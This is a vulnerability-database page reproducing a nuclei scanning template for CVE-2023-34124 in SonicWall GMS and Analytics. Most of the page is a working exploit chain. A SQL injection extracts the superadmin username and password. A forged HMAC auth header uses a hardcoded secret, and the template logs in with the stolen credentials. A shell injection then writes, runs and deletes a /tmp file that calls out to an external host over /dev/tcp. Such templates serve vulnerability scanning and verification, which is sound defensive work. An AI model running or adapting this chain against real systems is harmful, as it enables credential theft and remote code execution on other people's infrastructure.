Lucene search
K

SonicWall GMS and Analytics Web Services - Shell Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 302 Views

SonicWall GMS and Analytics Web Services - Shell Injection, CVE-2023-34124, unauthorized acces

Related
Refs
Code
id: CVE-2023-34124

info:
  name: SonicWall GMS and Analytics Web Services - Shell Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34124
    cwe-id: CWE-287,CWE-305
    epss-score: 0.40891
    epss-percentile: 0.98482
    cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: sonicwall
    product: analytics
    shodan-query: http.favicon.hash:-1381126564
    fofa-query: icon_hash=-1381126564
  tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive,vkev,vuln
variables:
  callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
  query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
  secret: '?~!@#$%^^()'
  auth: "{{hmac('sha1', query, secret)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
      - |
        GET /appliance/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "<title>SonicWall Universal Management Appliance</title>"
          - "<title>SonicWall Universal Management Host</title>"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: json
        part: body
        internal: true
        name: alias
        group: 1
        json:
          - '.alias'

      - type: regex
        part: body
        internal: true
        name: servertoken
        group: 1
        regex:
          - "getPwdHash.*,'([0-9]+)'"
# digest: 4b0a00483046022100c3cf3311f801453f751c0f601cc778969394b32e53af7ec7714242c2d7aa28f2022100d7ee60d59f39b3e80228fef729bf08aee6177f6215a173581a66db4fe29264ff:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation